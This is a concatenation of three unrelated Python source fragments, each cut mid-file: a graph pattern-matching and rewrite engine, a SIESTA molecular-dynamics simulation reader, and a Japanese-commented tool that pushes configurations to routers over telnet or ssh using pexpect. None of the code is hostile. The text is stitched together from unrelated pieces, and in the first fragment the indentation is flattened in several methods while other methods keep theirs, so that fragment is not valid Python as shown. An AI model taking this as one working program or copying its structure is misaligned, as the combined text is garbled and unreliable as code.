A `PatternNode` as root of pattern created from rewrite node.
"""
pattern_node: PatternNode = PatternNode.from_node(node)
inputs = []
for node_input in node.get_inputs():
inputs.append(PatternNode.create_pattern_from_node(node_input))
pattern_node._inputs = inputs
return pattern_node
@staticmethod
def create_pattern_from_list(type_list: []) -> 'PatternNode':
"""
Create a Pattern from a cell type list.
Args:
type_list (list[type]): Input cell type list.
Returns:
A `PatternNode` as root of pattern created from cell type list.
"""
last_node = None
for i, cell_type in enumerate(type_list):
cur_node: PatternNode = PatternNode(str(i) + "-" + str(cell_type), cell_type, [])
if last_node is not None:
cur_node._inputs = [last_node]
else:
cur_node._inputs = []
last_node = cur_node
return last_node
def add_input(self, node):
"""
Add an input for current `PatternNode`.
Args:
node (PatternNode): Cell type as an input.
"""
self._inputs.append(node)
def set_inputs(self, inputs):
"""
Set inputs for current `PatternNode`.
Args:
inputs (list[PatternNode]) : Inputs to be set as inputs of current `PatternNode`.
"""
self._inputs = inputs
def match(self, node: Node) -> bool:
"""
Check if current `PatternNode` can match with `node`.
Args:
node (Node) : A rewrite node to be match.
"""
return self._type == node.get_instance_type()
def get_inputs(self):
"""
Getter of inputs.
"""
return self._inputs
def name(self) -> str:
"""
Getter of name.
"""
return self._name
def type(self):
"""
Getter of type.
"""
return self._type
class VarNode(PatternNode):
    """
    A wildcard pattern node: `match` accepts any real rewrite node.

    Unlike `PatternNode`, the candidate's type is ignored; only its existence
    and a valid underlying handler are checked.
    """

    def __init__(self):
        super(VarNode, self).__init__("placeholder", Cell, [])

    def match(self, node: Node) -> bool:
        """Return True for any non-None node backed by a real handler."""
        if node is None:
            return False
        return node.get_handler() is not None
class Replacement(abc.ABC):
    """
    Interface of replacement function.

    Subclasses implement `build` to turn a match result into replacement
    nodes; instances are callable and simply forward to `build`.
    """

    @abc.abstractmethod
    def build(self, pattern: PatternNode, is_chain_pattern: bool, matched: OrderedDict) -> [Node]:
        """
        Interface define for creating replacement nodes from matched result.

        Note:
            Return value will be delivered into replace api of `SymbolTree` as argument, return value should follow
            restraint of parameter `new_nodes` of `replace` api if `SymbolTree`. See detail in docstring of `replace`
            api of `SymbolTree`.

        Args:
            pattern (PatternNode): A `PatternNode` represents root node of current pattern.
            is_chain_pattern (bool): A bool indicated if pattern is a chain pattern or a tree pattern.
            matched (OrderedDict): An OrderedDict map from pattern_node name to node represents matched result.

        Returns:
            A list of instance of `Node` as replacement nodes.
        """
        raise NotImplementedError

    def __call__(self, pattern: PatternNode, is_chain_pattern: bool, matched: OrderedDict) -> [Node]:
        # Convenience: a Replacement instance behaves as the replacement function.
        return self.build(pattern, is_chain_pattern, matched)
class PatternEngine:
"""
`PatternEngine` is defined how to transform a `SymbolTree` by `PattenNode`.
Args:
pattern (Union[PatternNode, List]): An instance of `PatternNode` or a cell-type-list to construct `PatternNode`
as root of a pattern.
replacement (callable): A callable define how to generate new_node.
"""
def __init__(self, pattern: Union[PatternNode, List], replacement: Replacement = None):
if isinstance(pattern, PatternNode):
self._is_chain = False
self._replacement: Replacement = replacement
self._pattern: PatternNode = pattern
elif isinstance(pattern, list):
self._is_chain = True
self._replacement: Replacement = replacement
self._pattern: PatternNode = PatternNode.create_pattern_from_list(pattern)
else:
raise RuntimeError("Unsupported pattern define")
def pattern(self) -> PatternNode:
"""
Getter of pattern.
"""
return self._pattern
    @staticmethod
    def _multi_to_multi_replace(stree: SymbolTree, old_root: Node, matched_dict: OrderedDict,
                                new_nodes: List[Node]) -> Node:
        """
        Replace multi-nodes in `stree` by another list of nodes.

        Note:
            Call replace api of `SymbolTree`, so parameter `new_nodes` has same restraint with parameter `new_nodes` of
            `replace` api if `SymbolTree`. See detail in docstring of `replace` api of `SymbolTree`.

        Args:
            stree (SymbolTree): A `SymbolTree` which replacement will apply on.
            old_root (Node): A `Node` represents root of original nodes.
            matched_dict (OrderedDict): An instance of OrderedDict as match result, where key is the pattern name, value
                is the matched node.
            new_nodes (list[Node]): A list of instance of Node as replacement.

        Returns:
            The `Node` returned by `stree.replace`, i.e. the root of the inserted replacement nodes.
        """
        to_erase_list = matched_dict.values()
        # keep all old nodes' inputs
        # (snapshotted by node name before replace detaches them, so the erase
        # loop below can still walk from an erased node to its former inputs)
        inputs_dict = {}
        for node in to_erase_list:
            inputs_dict[node.get_name()] = (node.get_inputs())
        # call replace of SymbolTree
        new_root = stree.replace(old_root, new_nodes)
        # replace only support one-to-one replace or one-to-multi replace, we need to erase nodes except
        # cur_node manually
        # BFS from the old root towards its inputs, erasing each matched node
        # only once nothing depends on it any more.
        queue: List[Node] = [old_root]
        while queue:
            cur_node: Node = queue.pop(0)
            if cur_node in to_erase_list:
                if cur_node.get_users():
                    # if cur_node is depended on by other node, skip now.
                    # cur_node will be push into queue and be erased later
                    continue
                if stree.get_node(cur_node.get_name()) is not None:
                    # cur_node is not erased before
                    stree.erase_node(cur_node)
                # continue the walk through this node's former inputs
                queue.extend(inputs_dict.get(cur_node.get_name()))
        return new_root
    def apply(self, stree: SymbolTree) -> bool:
        """
        Apply current pattern to a `SymbolTree`.

        Note:
            Sub-tree node will be supported in the near future.

        Args:
            stree (SymbolTree): A `SymbolTree` to be transformed.

        Returns:
            A bool represents if `stree` been changed.

        Raises:
            RuntimeError: If `SymbolTree` has no return node.
        """
        root: Node = stree.get_return_node()
        if root is None:
            raise RuntimeError("SymbolTree should be inited and has return node")
        changed = False
        # IR match: BFS from the return node towards the inputs.
        queue: [Node] = [root]
        # Why need visited: we don't need or should not visit the same node
        # multiple times because a pre-visited node may already have been erased
        # from the SymbolTree.
        # When will we visit same node multi-times:
        #   a
        #  / \
        # /   \
        # b   c
        # |   |
        # |   d
        # \   /
        #  \ /
        #   e
        # 1. Visit e, e does not match pattern, add b, d to queue.
        # 2. Visit b, b does not match pattern, add a to queue.
        # 3. Visit d, d does not match pattern, add c to queue.
        # 4. Visit a, a matches pattern and is erased from SymbolTree, add xx to queue.
        # 5. Visit c, c does not match pattern, add a to queue.
        # At step 5, a is visited a second time but a was erased from the
        # SymbolTree at step 4.
        visited: [Node] = []
        while queue:
            cur_node: Node = queue.pop(0)
            if cur_node is None:  # Because inputs of node is allowed to be None in replacement.
                continue
            if cur_node in visited:
                continue
            if cur_node.get_node_type() == NodeType.Tree:
                # Recurse into sub-trees before continuing the walk.
                subtree = TreeNodeHelper.get_sub_tree(cur_node)
                self.apply(subtree)
                visited.append(cur_node)
                queue.extend(cur_node.get_inputs())
                continue
            visited.append(cur_node)
            matched, matched_dict = self._match(self._pattern, cur_node)
            # Not matched (or match rejected by the consistency check): keep walking.
            if not matched or not PatternEngine._check_match(self._pattern, matched_dict):
                queue.extend(cur_node.get_inputs())
                continue
            # Matched: build replacement nodes (may be empty when no replacement is set).
            new_nodes: [Node] = []
            if self._replacement is not None:
                new_nodes: [Node] = self._replacement(self._pattern, self._is_chain, matched_dict)
            if not new_nodes:  # if replacement is empty, do nothing
                queue.extend(cur_node.get_inputs())
            else:  # replace cur_node with new_nodes
                changed = True
                root = PatternEngine._multi_to_multi_replace(stree, cur_node, matched_dict, new_nodes)
                queue.append(root)
        return changed
@staticmethod
def _merge_ordered_dict(dict1: OrderedDict, dict2: OrderedDict) -> OrderedDict:
"""
A static util method to merge two OrderedDict.
Args:
dict1 (OrderedDict): First dict to be merged.
dict2 (OrderedDict): Second dict to be merged.
Returns:
Merged OrderedDict.
"""
merged = dict1.copy()
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 10 20:50:35 2020
@author: awills
"""
import sisl, os, sys
from tqdm import tqdm
import numpy as np
import MDAnalysis as MD
class Simulation():
    '''Base class to build other simulations from, primarily for utility functions
    like _filefind and others in the future.
    '''
    def __init__(self):
        pass

    def _filefind(self, attrp, fext, attr):
        '''
        Locate a simulation file and store its full path as an attribute.

        Parameters
        ----------
        attrp : arbitrary
            Evaluated with bool(). If truthy and a string containing `fext`
            (case-insensitive), it is taken to be a filename relative to
            self.path. Otherwise, self.path is searched for the first file
            whose name contains `fext` (case-insensitive).
        fext : str
            The extension of the file to find, e.g. '.fdf' or '.ANI'.
        attr : str
            The attribute name to set via self.__setattr__().

        Returns
        -------
        None. Attributes are set in-place; if nothing is found (or attrp is
        falsy) then the attribute is set to None.
        '''
        if attrp:
            # BUGFIX: the original re-tested `fext in attrp.lower()` after the
            # case-sensitive check `fext in attrp`, so an uppercase extension
            # like '.ANI' in a user-supplied filename silently produced None.
            # Compare case-insensitively, once.
            if isinstance(attrp, str) and fext.lower() in attrp.lower():
                # Explicit filename given: trust it and join to the sim directory.
                self.__setattr__(attr, os.path.join(self.path, attrp))
            else:
                # attrp is merely truthy: search the directory for the extension.
                try:
                    self.__setattr__(attr, os.path.join(
                        self.path,
                        [i for i in os.listdir(self.path) if fext.lower() in i.lower()][0]))
                except IndexError:
                    # Empty list -> no file with that extension was found.
                    print("attribute not found: {} ending in {}".format(attr, fext))
                    self.__setattr__(attr, None)
        else:
            # Keep whatever falsy value the caller intended: attribute is None.
            self.__setattr__(attr, None)
class SiestaSimulation(Simulation):
def __init__(self, path, fdfb=True, fdfext='.fdf'):
'''
Parameters
----------
path : str
Root directory for the simulation, assuming the directory is populated by files generated by
a siesta command.
fdfb : arbitrary, optional
Either a string with SimulationLabel.fdf or a value to be checked by bool().
The default is True.
fdfext : str, optional
The extension for your FDF file, if not standard. The default is '.fdf'.
Returns
-------
None. Updates object in-place:
If fdf is a (non-empty) string and a file in self.path with matching fdfext(ension) is found as an extension,
this sets self.fdfp(ath) to input and self.fdf as a SISL SILE object
If fdf is is not a string, or is a string without matching fdfext(ension),
we look for a file in self.path with matching fdfext(ension) and set self.fdfp as the matching file
and self.fdf as the SISL SILE object returned with that path.
If the fdf retrieval is successful, many attributes are retrieved from the SISL object.
If the default keys we search for are absent, the SISL object returns None.
If the file is not found or specified as False, we set self.fdfp and self.fdf as None.
'''
#base directory of simulation
self.path = path
#fdf can be read in automatically if found; default is specified
self._filefind(attrp=fdfb, fext=fdfext, attr='fdfp')
#set sisl fdf reader
self.fdf = sisl.get_sile(self.fdfp) if self.fdfp else None
#if fdf found, can specify numerous things about the simulation
if self.fdf:
# TODO: expand data read in, add functionality for user input keys to .get()
self.simlabel = self.fdf.get("SimulationLabel")
self.latticeconstant = self.fdf.get('LatticeConstant')
self.latticevectors = np.array([float(v) for i in self.fdf.get("LatticeVectors") for v in i.split()]).reshape(3,3)
self.dt = self.fdf.get('MD.LengthTimeStep')
self.istep = self.fdf.get("MD.InitialTimeStep")
self.fstep = self.fdf.get("MD.FinalTimeStep")
#if both are specified, find number of steps
if self.istep and self.fstep:
self.nsteps = self.fdf.get("MD.FinalTimeStep") - self.fdf.get("MD.InitialTimeStep") + 1 #inclusive of first step
#if only final is specified
elif self.fstep and not self.istep:
self.nsteps = self.fstep
#if number of steps, assume MD simulation as opposed to GO or other
if self.nsteps:
self.simtype= 'md'
self.mdtype = self.fdf.get("MD.TypeOfRun")
#if mdtype is FC, this is a phonon calculation
if self.mdtype.lower() == 'FC'.lower():
self.simtype = 'phonon'
#if mdtype is CG, Broyden, or FIRE then it's GO
if self.mdtype.lower() in ['cg', 'broyden', 'fire']:
self.simtype = 'go'
self.natoms = self.fdf.get("NumberOfAtoms")
self.nspecies = self.fdf.get("NumberOfSpecies")
self.chemspeclab = [i.split() for i in self.fdf.get("ChemicalSpeciesLabel")]
    def iMD(self, ani=None, fext='.ANI', defaultcell=True):
        '''
        Initialize the MD trajectory (MDAnalysis Universe) from an .ANI file.

        Parameters
        ----------
        ani : arbitrary, optional
            Either a string with SimulationLabel.ANI or a value to be checked
            by bool(). The default is None.
        fext : str, optional
            The extension for your ANI file, if not standard. Default '.ANI'.
        defaultcell : bool, optional
            *Only used when no FDF cell information is available.*
            If True, a cubic cell 10% larger than the largest displacement
            along the trajectory is estimated. The default is True.

        Returns
        -------
        None. Updates the object in-place:
            Sets self.anip (path) via _filefind and self.universe as an
            MDAnalysis.Universe built from it.
            If an FDF with cell dimensions and a timestep is already set, the
            Universe and its trajectory are updated with that information.
            Otherwise assumed defaults are populated:
                dt = 0.5, MD simulation with Verlet time evolution,
                natoms/nsteps/nspecies taken from the input .ANI, and the
                default cell estimated from the max displacement between
                coordinates in the trajectory.
                *This is likely to GREATLY overestimate cell size when
                coordinates are not wrapped.*
        '''
        # First look for the ani file.
        self._filefind(ani, fext, 'anip')
        # Make sure there is one.
        # NOTE(review): assert is stripped under `python -O`; consider raising
        # FileNotFoundError instead -- kept as-is to preserve caller behavior.
        assert self.anip, "{} file not found in simulation directory.".format(fext)
        if (self.fdf) and (self.latticeconstant) and (self.latticevectors.tolist()):
            self.universe = MD.Universe(self.anip, topology_format='xyz',
                                        format='xyz', dt=self.dt)
            # Update topology with information from the fdf;
            # triclinic_dimensions allows cell specification for a generic cell.
            self.universe.triclinic_dimensions = self.latticeconstant*self.latticevectors
            # Default to femtoseconds in siesta.
            self.universe.trajectory.units['time'] = 'fs'
        else:
            self.universe = MD.Universe(self.anip, topology_format='xyz',
                                        format='xyz', dt=0.5)
            # Populate default assumptions (no FDF metadata available).
            self.simtype = "md"
            self.mdtype = "verlet"
            self.natoms = self.universe.trajectory.n_atoms
            self.nsteps = self.universe.trajectory.n_frames
            self.nspecies = len(set(self.universe.atoms.types))
            if defaultcell:
                mins = []
                maxs = []
                # This will GREATLY overestimate size if a periodic
                # calculation's coordinate output is not wrapped.
                print("Calculating default cell...")
                for frame in tqdm(self.universe.trajectory, file=sys.stdout):
                    xyz = frame.positions
                    maxs.append(xyz.max())
                    mins.append(xyz.min())
                cell_size = max(maxs) - min(mins)
                # Set size to 10% greater than max-min of coordinates, cubic.
                self.universe.dimensions = 3*[cell_size*1.1] + 3*[90]
def iMDE(self, mde=None, fext='.MDE'):
'''
Parameters
----------
mde : arbitrary, optional
Either a string with SimulationLabel.MDE or a value to be checked by bool().
The default is None.
fext : str, optional
The file extension for the MDE file, if not standard. The default is '.MDE'.
Returns
-------
None. Updates object in-place:
IF FOUND:
COLUMNS ARE Step, T (K), E_KS (eV), E_tot (eV), Vol (A^3), P (kBar)
If mde is a (non-empty) string and a file in self.path with matching mdeext(ension) is found as an extension,
this sets self.mdep(ath) to input and self.mde as an np.ndarray object with shape (nsteps, 6)
If mde is is not a string, or is a string without matching mdeext(ension),
we look for a file in self.path with matching mdeext(ension) and set self.mdep as the matching file
and self.mde as the np.ndarray object with shape (nsteps, 6) with that path.
If the file is not found or specified as False, we set self.mdep as None.
'''
#first look for mde file
self._filefind(mde, fext, 'mdep')
#make sure there is one
| |
import json
import os
import sys
import re
from time import sleep
import time
import pexpect # 追加ライブラリ
import jinja2 # 追加ライブラリ
from termcolor import colored, cprint # 追加ライブラリ
def doNgconf(filename):
    """Parse a router config file, push it to the router, and return the log file name.

    The handler is selected by the "routertype" field of the JSON header; an
    unknown type is reported but the (never-created) log file name is still
    returned, matching historical behavior.
    """
    # Parse the contents of the config file.
    routerconfig, sendlines = readrouterconfig(filename)
    # Build a timestamped log file name next to the config file.
    nowstr = time.strftime('%Y%m%d%H%M%S')
    filewithoutext, fileext = os.path.splitext(filename)
    logfilename = filewithoutext + "_" + nowstr + ".log"
    # Dispatch table instead of an if/elif chain.
    handlers = {
        "rtx-ssh": rtx_ssh_login,
        "rtx-telnet": rtx_telnet_login,
        "ix-telnet": ix_telnet_login,
        "ix-direct": ix_direct_login,
        "century-direct": century_direct_login,
        "edgecore-telnet": edgecore_telnet_login,
        "edgecore-direct": edgecore_direct_login,
    }
    handler = handlers.get(routerconfig["routertype"])
    if handler is None:
        print("unknown routertype: " + routerconfig["routertype"])
    else:
        handler(routerconfig, sendlines, logfilename)
    return logfilename
class ConfigHolder(object):
    """Groups one config file with its verification (.re) and negative
    verification (.nre) pattern files, and runs/validates the deployment."""

    def __init__(self):
        self.configFile = ""
        self.outputFile = ""
        self.regexFile = []
        self.renotFile = []

    def __str__(self):
        return f"configFile: {self.configFile}\tregexFile: {','.join(self.regexFile)}\trenotFile: {','.join(self.renotFile)}"

    def confirmToRun(self):
        """Show the config and all verification patterns, then wait for Enter."""
        with open(self.configFile) as f1:
            print(colored("========投入 " + self.configFile, 'cyan'))
            print(f1.read())
        for r in self.regexFile:
            with open(r) as f2:
                print(colored("========検証 " + r, 'cyan'))
                print(f2.read())
        for r in self.renotFile:
            with open(r) as f2:
                print(colored("\n========存在しない検証 " + r, 'cyan'))
                print(f2.read())
        input(colored("実行するには Enter を押して下さい", 'cyan'))
        return True

    def Run(self):
        """Push the config, then check every positive and negative pattern
        against the session log; raise on any verification failure."""
        logfilename = doNgconf(self.configFile)
        for r in self.regexFile:
            with open(r) as f2:
                print(colored("\n========検証 " + r, 'cyan'))
                print(f2.read())
            if checkre(r, logfilename):
                print(colored("========検証に成功しました " + r + "\n", 'green'))
            else:
                print(colored("XXXXXXXX検証に失敗しました " + r + "\n", 'red'))
                raise Exception()
        for r in self.renotFile:
            with open(r) as f2:
                print(colored("\n========存在しない検証 " + r, 'cyan'))
                print(f2.read())
            if checkre(r, logfilename):
                print(colored("XXXXXXXX検証に失敗しました " + r + "\n", 'red'))
                raise Exception()
            else:
                print(colored("========検証に成功しました " + r + "\n", 'green'))

    @staticmethod
    def appendFile(filename, result):
        """Fold `filename` into `result`: .re/.nre files annotate the most
        recent holder, anything else starts a new ConfigHolder."""
        if filename.endswith(".re"):
            result[-1].regexFile.append(filename)
        elif filename.endswith(".nre"):
            result[-1].renotFile.append(filename)
        else:
            holder = ConfigHolder()
            holder.configFile = filename
            result.append(holder)
        return result
def expandTemplate(dict, templatedir, outputdir):
    '''
    expandTemplate

    Render every top-level template found in `templatedir` with `dict` as the
    parameter set, writing each result to `outputdir` as "<id>_<templatename>".
    Returns a list of ConfigHolder objects built from the generated files.
    '''
    # NOTE: the parameter name `dict` shadows the builtin; it is kept because
    # it is part of the public signature (callers may pass it by keyword).
    env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath=templatedir))
    result = []
    # Only templates at the top level (no "/" in the name).
    for name in [t for t in env.list_templates() if t.find("/") == -1]:
        outputpath = os.path.join(outputdir, dict["id"] + "_" + name)
        print(name)
        rendered = env.get_template(name).render(dict)
        with open(outputpath, "w") as fp:
            fp.write(rendered)
        result = ConfigHolder.appendFile(outputpath, result)
    return result
def readrouterconfig(filename):
    '''
    readrouterconfig

    Read a router config file: the first line is parsed as JSON and returned
    as a dict (first tuple element); all remaining lines are returned as-is
    (second tuple element). Any JSON *string* value beginning with "$" is
    replaced by the value of the matching environment variable when that
    variable is set.
    '''
    with open(filename, "r") as fp:
        jsonstr = fp.readline()
        sendlines = fp.readlines()
    jsonobj = json.loads(jsonstr)
    for k, v in jsonobj.items():
        # BUGFIX: only string values can carry a "$ENV_VAR" reference --
        # non-string JSON values (numbers, booleans) previously crashed on
        # .startswith().
        if isinstance(v, str) and v.startswith("$") and os.getenv(v[1:]):
            jsonobj[k] = os.getenv(v[1:])
    return (jsonobj, sendlines)
def checkre(pfile, tfile):
    """Read a regex from the first line of `pfile` and search the whole text
    of `tfile` with it (DOTALL); returns the match object or None."""
    with open(pfile) as pattern_file:
        pattern = pattern_file.readline().strip()
    with open(tfile) as target_file:
        return re.search(pattern, target_file.read(), re.DOTALL)
class multifile(object):
    """Tee-like wrapper around several file objects: any method invoked on
    this object is invoked on every wrapped file, and the last file's return
    value is returned (used to mirror a pexpect session log to stdout)."""

    def __init__(self, files):
        self._files = files

    def __getattr__(self, attr, *args):
        # Unresolved attributes become broadcasting callables.
        return self._wrap(attr, *args)

    def _wrap(self, attr, *args):
        def broadcast(*call_args, **call_kwargs):
            for target in self._files:
                outcome = getattr(target, attr, *args)(*call_args, **call_kwargs)
            return outcome
        return broadcast
def ix_telnet_login(routerconfig, sendlines, logfilename):
    '''
    ix_telnet_login

    Send a config to an IX router via an intermediate "center" router, and
    record the whole session to `logfilename` (also echoed to stdout).

    The source config file is expected to contain JSON on its first line and
    the commands to send from the second line on, e.g.:
    { "router": "10.0.0.1", "routertype": "ix_telnet", "username": "<login user>", "password": "<PASSWORD>", "centerrouter": "", "centeruser": "", "centerpassword": "" }
    show config
    '''
    sleepspan = 0.5
    timeout = 5
    # Mirror everything the router echoes to both stdout and the log file.
    logfp1 = open(logfilename, 'wb')
    logfp = multifile([sys.stdout.buffer, logfp1])
    child = pexpect.spawn('telnet ' + routerconfig["centerrouter"])
    child.logfile_read = logfp
    child.ignore_sighup = True
    try:
        # Center router login.
        child.expect('login: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["centeruser"] + "\r")
        child.expect('Password: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["centerpassword"] + "\r")
        # From the center router, telnet on to the target and log in.
        child.expect('# ', timeout=timeout)
        sleep(sleepspan)
        child.send("telnet " + routerconfig["router"] + "\r")
        child.expect('login: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["username"] + "\r")
        child.expect('Password: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["password"] + "\r")
        child.expect('# ', timeout=timeout)
        # Determine the prompt string.
        sleep(sleepspan)
        # Skip the router banner by sending a comment whose text cannot occur in it.
        child.send("! non-existent-lines\r")
        child.expect('non-existent-lines', timeout=timeout)  # no newline included yet at this point
        prom = ""
        prom1 = ""
        # Read one byte at a time up to the '#' to capture the prompt text.
        while (prom1 != "#"):
            prom = prom + prom1
            c = child.read(1)
            prom1 = chr(c[0])
        # Switch to administrator (config) mode.
        sleep(sleepspan)
        child.send('configure' + "\r")
        child.expect(prom, timeout=timeout)
        sleep(sleepspan)
        child.send('svintr-config' + "\r")
        child.expect(prom, timeout=timeout)
        # Send the config, skipping blank lines.
        for line in sendlines:
            if (re.match(r"^\s*$", line)):
                continue
            sleep(sleepspan)
            child.send(line + "\r")
            if (line.startswith("reload y")):  # reload prints no prompt; we cannot proceed past it
                print(colored("========reload しています。ルータの起動を待って下さい ", 'yellow'))
                sleep(sleepspan * 10)
                return
            child.expect(prom)  # use pexpect's default 30 s timeout here
        # Leave config mode and close the nested sessions.
        sleep(sleepspan)
        child.send('exit' + "\r")
        child.expect(prom, timeout=timeout)
        sleep(sleepspan)
        child.send('exit' + "\r")
        sleep(sleepspan)
        child.send('exit' + "\r")
        sleep(sleepspan)
    finally:
        logfp.flush()
        logfp1.close()  # do not close stdout itself
        child.close()
def ix_direct_login(routerconfig, sendlines, logfilename):
    '''
    ix_direct_login

    Send a config directly to an IX router (no intermediate router) and
    record the whole session to `logfilename` (also echoed to stdout).

    The source config file is expected to contain JSON on its first line and
    the commands to send from the second line on, e.g.:
    { "router": "10.0.0.1", "routertype": "ix_direct", "username": "<login user>", "password": "<PASSWORD>" }
    show config
    '''
    sleepspan = 0.5
    timeout = 5
    # Mirror everything the router echoes to both stdout and the log file.
    logfp1 = open(logfilename, 'wb')
    logfp = multifile([sys.stdout.buffer, logfp1])
    child = pexpect.spawn('telnet ' + routerconfig["router"])
    child.logfile_read = logfp
    try:
        # User login.
        child.expect('login: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["username"] + "\r")
        child.expect('Password: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["password"] + "\r")
        child.expect('# ', timeout=timeout)
        # Determine the prompt string.
        sleep(sleepspan)
        # Skip the router banner by sending a comment whose text cannot occur in it.
        child.send("! non-existent-lines\r")
        child.expect('non-existent-lines', timeout=timeout)  # no newline included yet at this point
        prom = ""
        prom1 = ""
        # Read one byte at a time up to the '#' to capture the prompt text.
        while (prom1 != "#"):
            prom = prom + prom1
            c = child.read(1)
            prom1 = chr(c[0])
        # Switch to administrator (config) mode.
        sleep(sleepspan)
        child.send('configure' + "\r")
        child.expect(prom, timeout=timeout)
        sleep(sleepspan)
        child.send('svintr-config' + "\r")
        child.expect(prom, timeout=timeout)
        # Send the config, skipping blank lines.
        for line in sendlines:
            if (re.match(r"^\s*$", line)):
                continue
            sleep(sleepspan)
            child.send(line + "\r")
            child.expect(prom)  # use pexpect's default 30 s timeout here
        # Leave config mode and close the session.
        sleep(sleepspan)
        child.send('exit' + "\r")
        child.expect(prom, timeout=timeout)
        sleep(sleepspan)
        child.send('exit' + "\r")
        sleep(sleepspan)
        child.send('exit' + "\r")
        sleep(sleepspan)
    finally:
        logfp.flush()
        logfp1.close()  # do not close stdout itself
        child.close()
def century_direct_login(routerconfig, sendlines, logfilename):
    '''
    century_direct_login

    Send a config directly to a Century router (no intermediate router) and
    record the whole session to `logfilename` (also echoed to stdout).

    The source config file is expected to contain JSON on its first line and
    the commands to send from the second line on, e.g.:
    { "router": "10.0.0.1", "routertype": "century_direct", "username": "<login user>", "password": "<PASSWORD>" }
    show config
    '''
    sleepspan = 0.5
    timeout = 5
    # Mirror everything the router echoes to both stdout and the log file.
    logfp1 = open(logfilename, 'wb')
    logfp = multifile([sys.stdout.buffer, logfp1])
    child = pexpect.spawn('telnet ' + routerconfig["router"])
    child.logfile_read = logfp
    try:
        # User login.
        child.expect('login: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["username"] + "\r")
        child.expect('Password: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["password"] + "\r")
        child.expect('#', timeout=timeout)
        # Determine the prompt string.
        sleep(sleepspan)
        # Skip the router banner by sending a comment whose text cannot occur in it.
        child.send("! non-existent-lines\r")
        child.expect('non-existent-lines', timeout=timeout)  # no newline included yet at this point
        prom = ""
        prom1 = ""
        # Read one byte at a time up to the '#' to capture the prompt text.
        while (prom1 != "#"):
            prom = prom + prom1
            c = child.read(1)
            prom1 = chr(c[0])
        prom = "\n"+ prom.strip()  # Century echoes lines back with \r, so anchor on \n plus the stripped prompt
        # Disable paging so long output does not stall the session.
        sleep(sleepspan)
        child.send('terminal length 0' + "\r")
        child.expect(prom, timeout=timeout)
        # Enter configuration mode.
        sleep(sleepspan)
        child.send('configure terminal' + "\r")
        child.expect(prom, timeout=timeout)
        # Send the config, skipping blank lines.
        for line in sendlines:
            if (re.match(r"^\s*$", line)):
                continue
            sleep(sleepspan)
            child.send(line + "\r")
            child.expect(prom)  # use pexpect's default 30 s timeout here
        # Leave config mode and close the session.
        sleep(sleepspan)
        child.send('exit' + "\r")
        child.expect(prom, timeout=timeout)
        sleep(sleepspan)
        child.send('exit' + "\r")
        sleep(sleepspan)
        child.send('exit' + "\r")
        sleep(sleepspan)
    finally:
        logfp.flush()
        logfp1.close()  # do not close stdout itself
        child.close()
def rtx_telnet_login(routerconfig, sendlines, logfilename):
    '''
    rtx_telnet_login

    Send a config to a Yamaha RTX810/RTX1200 over telnet and record the whole
    session to `logfilename` (also echoed to stdout).

    The source config file is expected to contain JSON on its first line and
    the commands to send from the second line on, e.g.:
    { "router": "10.0.0.1", "routertype": "rtx-telnet", "password": "<PASSWORD>", "adminpassword": "<PASSWORD>" }
    show config
    '''
    sleepspan = 0.5
    timeout = 5
    # Mirror everything the router echoes to both stdout and the log file.
    logfp1 = open(logfilename, 'wb')
    logfp = multifile([sys.stdout.buffer, logfp1])
    child = pexpect.spawn('telnet ' + routerconfig["router"])
    child.logfile_read = logfp
    try:
        # User login (RTX over telnet asks only for a password).
        child.expect('Password: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["password"] + "\n")
        child.expect('> ', timeout=timeout)
        # Determine the prompt string.
        sleep(sleepspan)
        # Skip the router banner by sending a comment whose text cannot occur in it.
        child.send("# non-existent-lines\n")
        child.expect('non-existent-lines', timeout=timeout)  # no newline included yet at this point
        prom = ""
        prom1 = ""
        # Read one byte at a time up to the '>' to capture the prompt text.
        while (prom1 != ">"):
            prom = prom + prom1
            c = child.read(1)
            prom1 = chr(c[0])
        # Switch to administrator mode.
        sleep(sleepspan)
        child.send('administrator' + "\n")
        child.expect('Password: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["adminpassword"] + "\n")
        child.expect(prom, timeout=timeout)
        # Send the config, skipping blank lines.
        for line in sendlines:
            if (re.match(r"^\s*$", line)):
                continue
            sleep(sleepspan)
            child.send(line + "\n")
            child.expect(prom)  # use pexpect's default 30 s timeout here
        # Leave administrator mode, then close the session.
        sleep(sleepspan)
        child.send('exit' + "\n")
        child.expect(prom + '> ', timeout=timeout)
        sleep(sleepspan)
        child.send('exit' + "\n")
        sleep(sleepspan)
    finally:
        logfp.flush()
        logfp1.close()  # do not close stdout itself
        child.close()
def rtx_ssh_login(routerconfig, sendlines, logfilename):
    '''
    rtx_ssh_login

    Send a config to a Yamaha RTX810/RTX1200 over ssh and record the whole
    session to `logfilename` (also echoed to stdout).

    The source config file is expected to contain JSON on its first line and
    the commands to send from the second line on, e.g.:
    { "router": "10.0.0.1", "routertype": "rtx-ssh", "username": "<login user>", "password": "<PASSWORD>", "adminpassword": "<PASSWORD>" }
    show config
    '''
    sleepspan = 0.5
    timeout = 5
    # Mirror everything the router echoes to both stdout and the log file.
    logfp1 = open(logfilename, 'wb')
    logfp = multifile([sys.stdout.buffer, logfp1])
    child = pexpect.spawn('ssh -l ' + routerconfig["username"] + " " + routerconfig["router"])
    child.logfile_read = logfp
    try:
        # User login (ssh prompts with lowercase 'password: ').
        child.expect('password: ', timeout=timeout)
        sleep(sleepspan)
        child.send(routerconfig["password"] + "\n")
        child.expect('> ', timeout=timeout)
        # Determine the prompt string.
        sleep(sleepspan)
        # Skip the router banner by sending a comment whose text cannot occur in it.
        child.send("# non-existent-lines\n")
        child.expect('non-existent-lines', timeout=timeout)  # no newline included yet at this point
        prom = ""
        prom1 = ""
        # Read one byte at a time up to the '>' to capture the prompt text.
        while (prom1 != ">"):
            prom = prom + prom1
            c = child.read(1)
            prom1 = chr(c[0])
        # Switch to administrator mode.
        sleep(sleepspan)
        child.send('administrator' + "\n")
